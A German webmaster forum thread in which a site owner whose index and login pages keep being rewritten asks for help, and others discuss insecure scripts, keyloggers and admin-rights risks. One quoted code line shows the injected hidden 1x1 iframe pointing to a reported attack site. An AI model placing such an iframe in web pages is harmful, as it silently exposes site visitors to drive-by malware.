ABAKUS

Pretender hat geschrieben:Jemand ne Idee wie ich den Sack daran hintere? FTP-Pass ändern bringt offenbar nichts da ich es oft ändere

Variante 1: Du benutzt irgendwelche Skripte auf deinem Webserver, die unsicher sind.
Variante 2: Du hast einen Schnüffler auf deinem PC, der deinen Netzwerkverkehr und/oder Tastatureingaben mitliest.

Hi,

kann jemand durch unsichere Scripte meine Webseiten neu schreiben?

Netzwerk glaube ich eher nicht, da ich seit langem nichts mehr gemacht habe an dieser Domain.

Also es sind ledigliche die index-Seiten, auch die in den jeweiligen Ordner betroffen. Achso, die Login-Seiten auch.

wordpress?
Eventuell das hier?
https://rzaman.com/how-to-remove-malici ... -yourself/

Ich kenne ein paar die das auch hatten.. Bist also nicht alleine.
Jedesmal in der Art:

Pretender hat geschrieben:kann jemand durch unsichere Scripte meine Webseiten neu schreiben?

Selbstverständlich. Und das jede Software Sicherheitslücken haben kann, sollte nicht an dir vorbeigegangen sein.

Netzwerk glaube ich eher nicht, da ich seit langem nichts mehr gemacht habe an dieser Domain.

Glauben ist nicht wissen. Außerdem schriebst du eben noch von „einigen Domains“ und was sind das für Seiten, wenn du da „seit langem“ nichts mehr dran änderst? Das hat ja schon Seltenheitswert.

Klar hat jede Software auch Sicherheitslücken, das ist mir auch klar.

Ich hatte lediglich vermutet, dass man da einen FTP Zugang braucht bzw. eine Seite die beschreibbar ist also mit den entsprechenden Dateirechten.

Dateirechte stehen auf 644 vieleicht sollten die auf 444 geändert werden.


@Synonym : Das scheint das gleich zu sein, nur mit einer anderen URL im IFrame. Muss mal meinen Rechner scannen. Allerdings habe ich ESET NOD32 drauf und scanne regelmäßig meinen Rechner.

Pretender hat geschrieben:Ich hatte lediglich vermutet, dass man da einen FTP-Zugang braucht

Wenn die Seiteninhalte aus einer Datenbank stammen, wie bei jeder Blog- oder CMS-Software, braucht man keinen FTP-Zugang. Und selbst wenn keine Datenbank im Hintergrund läuft, Skripte können unter Umständen auch selbst Dateien anlegen bzw. ändern.

Dateirechte stehen auf 644 vieleicht sollten die auf 444 geändert werden.

Das bringt dir überhaupt nichts, außer, dass du dir selbst die Schreibrechte wegnimmst (die du dir auch wiedergeben kannst, und kannst du sie dir selbst wiedergeben, kann das auch jeder andere, der deine Zugangsdaten hat).

@Synonym : Das scheint das gleich zu sein, nur mit einer anderen URL im IFrame.

Wenn man fremde Inhalte einbinden will, ist das auch die naheliegendste Möglichkeit. Das muss nicht bedeuten, dass das derselbe Angreifer ist.

Allerdings habe ich ESET NOD32 drauf und scanne regelmäßig meinen Rechner.

Benutzt du deinen Rechner im Administratormodus? Dann hilft dir der schönste Virenscanner unter Umständen auch nichts, denn wenn Schadsoftware ebenfalls mit Administratorrechten läuft (und gerade Schadsoftware wird sich kaum mit weniger Rechten begnügen), kann sie deinen Scanner mit Leichtigkeit an der Nase herumführen.

Vielleicht erzählst du erstmal, was du auf deinen Servern drauf hast, Skripte, bestimmte Software oder ausschließlich statische Dateien? Wo wird die Änderung sichtbar, in den Dateien, die du per FTP siehst oder im Quellcode, den du im Browser anzeigen kannst?

Ansonst ist das hier ein reines Stochern im Nebel.

Ja, ich benutze den Rechner im Admin-Modus. Mir sind die Konsequenzen bewusst und muss daher nicht diskurtiert werden. Ich habe eine Arbeitsmodus vorgesehen und werde diesen nun ausbauen und benutzen.

Auf dem Server läuft so gut wie alles, außer Wordpress und son Krempel. Also Scripte, Statisches und vieles mehr. Ich denke es bingt nix weiter zu spekulieren, da alles möglich ist und ich hier nichts schreiben könnte was den den Angriff ins Licht rückt.

Ich werde daher an meinen Sicheitsrichtlinien arbeiten und die Script durch checken sowie die LOG checken um vieleicht ein Muster zu erkennen.

Vielen Dank für die Lösungsversuche!

Hatten wir vor zwei Jahren auch. Unsichere Extention von typo3.
Der Angreifer hat ein script auf dem Server hinterlassen, das auch die neu eingerichteten Passwörter an ihn geschickt hat. Er hatte fast vollen Zugriff auf die Maschine - wenn wir was ausgebessert hatten, war´s schnell wieder da. Egal, ob typo3 oder statische Seiten.
Wir haben alles auf einer neuen Kiste frisch eingerichtet.

Pretender hat geschrieben:

Code: Alles auswählen

<iframe src ="http&#58;//telenes.biz/box/pWtI" width="1" height="1"> </iframe>

Schon mal auf der Seite gewesen? Ich bekomme da diese Meldung

Reported Attack Site!

This web site at telenes.biz has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

.